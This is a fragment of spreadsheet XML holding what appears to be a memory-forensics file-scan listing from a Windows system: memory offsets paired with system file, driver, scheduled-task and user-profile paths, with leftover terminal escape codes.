    <t>Policy Temp</t>
  </si>
  <si>
    <t>late M</t>
  </si>
  <si>
    <t>anagement (Automated)_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf583400</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\bfe.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf583cc8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf585238</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\a11adefc-51f4-4f2f-b942-6973afab9038_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf585e18</t>
  </si>
  <si>
    <t>\Windows\System32\msshooks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5861c0</t>
  </si>
  <si>
    <t>\Windows\System32\PeerDistSh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5868a8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf587b10</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\MobilePC\HotStart_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf587ca8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\bba67ad0-4ba0-4b44-827b-ff419b70c057_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf587f80</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\ab771a9f-fb0f-4fa1-8b5f-48186615901e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf588200</t>
  </si>
  <si>
    <t>\Windows\System32\winrnr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf588410</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58b038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58b4b0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\de8699d2-8a05-42f7-8a85-5162af47d26a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58b828</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\bd2229c8-b74e-4211-95c7-d0d98223d348_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58b9a8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\SideShow\SessionAgent_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58c778</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58cd80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mpsdrv.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58da58</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\de8bae53-2809-4f75-85ef-427d364b9b2c_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58e4c0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\e79b2998-8f63-451a-a56d-26edc0a5098a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58e858</t>
  </si>
  <si>
    <t>anagement (Manual)_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58ecd8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\e6f3a527-8b0b-43fa-94eb-584032761924_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58ee48</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\bowser.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf58fc30</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mrxsmb.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf590480</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\0d9b5d92-3a22-486d-a887-3aa21597cf27_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf590820</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\f1369a11-e983-4458-b390-712efa1cba44_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf590968</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf590f48</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5917d8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5919f8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mrxsmb10.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf591b18</t>
  </si>
  <si>
    <t>0xdf593038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf593420</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf593a50</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\05ee699f-ab25-42d8-8781-558c5d1d2fad_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf594028</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\mrxsmb20.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf594400</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\03eef049-e909-4855-bfa0-6cfb92244b24_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf596390</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf596448</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf596720</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\Scheduled_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf596b58</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\06fc43ca-f7e9-453b-9386-1e36a3a1643b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5975e8</t>
  </si>
  <si>
    <t>0xdf59b478</t>
  </si>
  <si>
    <t>0xdf59b598</t>
  </si>
  <si>
    <t>0xdf59b710</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Users\sshd_server\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM_x001B_</t>
  </si>
  <si>
    <t>0xdf59bba0</t>
  </si>
  <si>
    <t>0xdf59bd18</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf59bf00</t>
  </si>
  <si>
    <t>0xdf59d138</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\086c9cfb-2176-4df0-bd27-c65350581e9a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf59dbc8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\071d41b6-8806-4eb0-b661-6cb67be6e86e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf59e160</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf59ebc0</t>
  </si>
  <si>
    <t>0xdf59eee0</t>
  </si>
  <si>
    <t>0xdf59f5f0</t>
  </si>
  <si>
    <t>0xdf59f8c0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\0e12083c-0335-49db-9542-ba1ec6d83ecc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a07c8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a09c8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\0f3b11c3-ca32-4963-8dab-c3c413884c6c_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a2268</t>
  </si>
  <si>
    <t>\$MftMirr_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a26e8</t>
  </si>
  <si>
    <t>0xdf5a29a8</t>
  </si>
  <si>
    <t>\Windows\inf\nettcpip.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a31f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sppsvc.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a3670</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_usb.inf_31bf3856ad364e35_6.1.7601.23933_none_cd72a5ac85e35586\usb.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a4748</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\inetpp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a4e18</t>
  </si>
  <si>
    <t>0xdf5a4f60</t>
  </si>
  <si>
    <t>\Windows\System32\sqlceqp30.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a66d8</t>
  </si>
  <si>
    <t>0xdf5a6aa0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\2375f586-1009-41fb-b54e-30d8af2b781d_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a6c78</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a7038</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\24fa84a0-e087-48ec-bc51-2b9c4c815d78_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a74d8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a8140</t>
  </si>
  <si>
    <t>0xdf5a89e0</t>
  </si>
  <si>
    <t>0xdf5a8dd0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5a9900</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\2bd05ba6-988d-4bd3-a9cd-9a39f80af524_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5aa4a8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\CorruptionDetector_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ab508</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Ras\MobilityManager_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ab650</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\4040e761-8758-4007-b2fe-142b24bf4b16_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ac9a8</t>
  </si>
  <si>
    <t>0xdf5ad820</t>
  </si>
  <si>
    <t>0xdf5ae870</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Sidebar.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5aea50</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Protect\S-1-5-21-3583694148-1414552638-2922671848-100</t>
  </si>
  <si>
    <t>3\Preferred_x001B_[</t>
  </si>
  <si>
    <t>0xdf5aebc0</t>
  </si>
  <si>
    <t>0xdf5af1d0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\parport.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b0038</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\5080853e-b3e8-4f8c-9ddd-15c0031c4cd1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b0430</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\50fb5a03-0e1e-48de-b8a1-bee9d7d2cd0f_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b0880</t>
  </si>
  <si>
    <t>0xdf5b1268</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\534e9a6e-9cac-4230-9881-5fa34e171b24_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b1cb0</t>
  </si>
  <si>
    <t>\Windows\System32\IDStore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b1f80</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Background Synchronization_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b2038</t>
  </si>
  <si>
    <t>0xdf5b31b8</t>
  </si>
  <si>
    <t>cmiadapter.</t>
  </si>
  <si>
    <t>0xdf5b4630</t>
  </si>
  <si>
    <t>cmiv2.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdf5b46e8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\spsys.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b5970</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\qmgr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b5d00</t>
  </si>
  <si>
    <t>\Windows\System32\netcfg.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b6468</t>
  </si>
  <si>
    <t>0xdf5b6660</t>
  </si>
  <si>
    <t>\Windows\System32\powertracker.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b6718</t>
  </si>
  <si>
    <t>\Windows\System32\spp\plugin-manifests-signed\sppwinob-spp-plugin-manifest-signed.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b6d10</t>
  </si>
  <si>
    <t>0xdf5b85b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft-windows-security-spp-installer_31bf3856ad364e35_6.1.7601.17514_n</t>
  </si>
  <si>
    <t>one_b8de3b180</t>
  </si>
  <si>
    <t>67e3952\spp</t>
  </si>
  <si>
    <t>inst.d</t>
  </si>
  <si>
    <t>0xdf5b8868</t>
  </si>
  <si>
    <t>0xdf5b8a78</t>
  </si>
  <si>
    <t>\Windows\System32\sppwinob.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b8c48</t>
  </si>
  <si>
    <t>0xdf5b9330</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mspaint.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5b9bc0</t>
  </si>
  <si>
    <t>0xdf5b9d40</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-security-spp-installer_31bf3856ad364e35_6.1.76</t>
  </si>
  <si>
    <t>01.17514_none</t>
  </si>
  <si>
    <t>_b8de3b1806</t>
  </si>
  <si>
    <t>7e3952</t>
  </si>
  <si>
    <t>0xdf5ba548</t>
  </si>
  <si>
    <t>0xdf5baad0</t>
  </si>
  <si>
    <t>\Windows\System32\nshwfp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bab88</t>
  </si>
  <si>
    <t>\Windows\System32\dhcpcmonitor.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bad58</t>
  </si>
  <si>
    <t>\Windows\System32\EAPQEC.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bae10</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sdbinst.exe.mui_x001B_[0K_x001B_[45G</t>
  </si>
  <si>
    <t>0xdf5baf80</t>
  </si>
  <si>
    <t>\Windows\System32\mprapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bb380</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\5b184694-64c3-4633-94c5-945b3fa561d6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bc320</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\WDI\ResolutionHost_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bc7a0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\WindowsBackup\ConfigNotification_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bce00</t>
  </si>
  <si>
    <t>0xdf5bcf80</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\5590812b-fc25-428c-9bfd-6330fd151d9f_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bd2a0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\5c2c622f-70e9-4194-a7da-033e827365ad_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bdd80</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChan</t>
  </si>
  <si>
    <t>ge_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5be458</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\AltTab.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5be8f8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\AppID\PolicyConverter_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bf240</t>
  </si>
  <si>
    <t>0xdf5bf6e0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\6aef0c98-2cb4-4b67-8c70-4c977c7355cc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bf958</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5bfb58</t>
  </si>
  <si>
    <t>\Windows\System32\tlscsp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c0230</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\6375cc1c-d975-48d2-9cd5-63db19b10d4a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c0398</t>
  </si>
  <si>
    <t>0xdf5c0518</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\60158c7a-6808-42cd-95ee-afd9a57925db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c1180</t>
  </si>
  <si>
    <t>0xdf5c1488</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rdpdr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c1588</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\6b7ac694-8d6d-481b-9dd8-2a3a741ada6d_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c1a00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\termsrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c28a8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c35c8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c37c8</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpSvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c3a00</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\6af56008-d616-46fe-9508-a8e978e221e4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c3c80</t>
  </si>
  <si>
    <t>\Windows\System32\d3d8thk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c4038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c44f8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\731e9c62-95b5-4c8c-ab64-4cc591c9ff5b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c4c50</t>
  </si>
  <si>
    <t>\Windows\System32\rdpcorets.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c4d08</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c55d0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c5a18</t>
  </si>
  <si>
    <t>0xdf5c5e70</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c6310</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c67e8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\757f206c-cb73-4ddc-a468-9a54e38d0c47_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c68a0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\88c51f97-43be-4fb2-8716-4355774cc43c_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c6b58</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\7d3c7871-a917-4ef0-82e8-5f0a96423051_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c6c10</t>
  </si>
  <si>
    <t>0xdf5c6cc8</t>
  </si>
  <si>
    <t>0xdf5c6ec8</t>
  </si>
  <si>
    <t>\Windows\System32\pdh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c6f80</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\73259f86-29d6-42ff-b1e7-634f6e40d4f8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c75d8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\7dd46f9c-2c72-4553-8381-8fdce18d6798_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c7958</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c7b40</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c7ca8</t>
  </si>
  <si>
    <t>\Windows\System32\lsmproxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c8038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c8258</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appra</t>
  </si>
  <si>
    <t>iser_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c88d0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\8ab5b1f7-5391-4301-a998-c925255d1f7d_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c9248</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTa</t>
  </si>
  <si>
    <t>sk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c9448</t>
  </si>
  <si>
    <t>\Windows\System32\wdiasqmmodule.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c9500</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\9f54b95f-5096-4803-ae61-e9b3ac5b616d_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c96e8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\90805a89-edee-47cc-baee-591d011d90d2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5c9d80</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\8ee95efa-5529-4aec-bdde-8165e5f15b30_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ca038</t>
  </si>
  <si>
    <t>0xdf5ca318</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ca888</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\9efacbe6-a797-4905-a0c6-014cd3000dbb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5caa88</t>
  </si>
  <si>
    <t>0xdf5cab40</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mscms.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cb038</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\C</t>
  </si>
  <si>
    <t>ache\cache.da</t>
  </si>
  <si>
    <t>t_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cb268</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\d8bb5b7f-d0ca-4f67-a3d7-73e1d05f63da_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cbcc8</t>
  </si>
  <si>
    <t>\Windows\System32\mscms.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cbd80</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cbf80</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygwin1.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cc1f8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\9fd7d460-4705-4636-ac3f-aa805af9f544_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cc3e0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataC</t>
  </si>
  <si>
    <t>ollector_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cd4e8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\RAC\RacTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cd668</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\a2cfb6f3-b3ae-4971-8e29-c415be22d2e5_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cd850</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cdd48</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\9f6a68c8-58d8-4056-b22f-b10043353728_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cde00</t>
  </si>
  <si>
    <t>\Windows\System32\pcasvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ce8b0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\a1cfa52f-06f2-418d-addb-cd6456d66f43_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5ce968</t>
  </si>
  <si>
    <t>0xdf5cea20</t>
  </si>
  <si>
    <t>0xdf5cec58</t>
  </si>
  <si>
    <t>\Windows\System32\d3d9.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cf038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Maintenance\WinSAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cf1d8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cf5a0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\b9bee219-c29e-4310-819c-147a5a0e045e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cf768</t>
  </si>
  <si>
    <t>0xdf5cf968</t>
  </si>
  <si>
    <t>0xdf5cfa20</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\a6394592-54ce-4e93-8d64-1a068f462632_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5cfba0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d02d8</t>
  </si>
  <si>
    <t>\Windows\System32\Microsoft\Protect\S-1-5-20\236545a9-f294-481a-a421-a46ca317d70e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d09f0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator</t>
  </si>
  <si>
    <t>0xdf5d0f80</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\a316e645-1c56-45a6-bd6a-7dca79778090_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d1038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5d1178</t>
  </si>
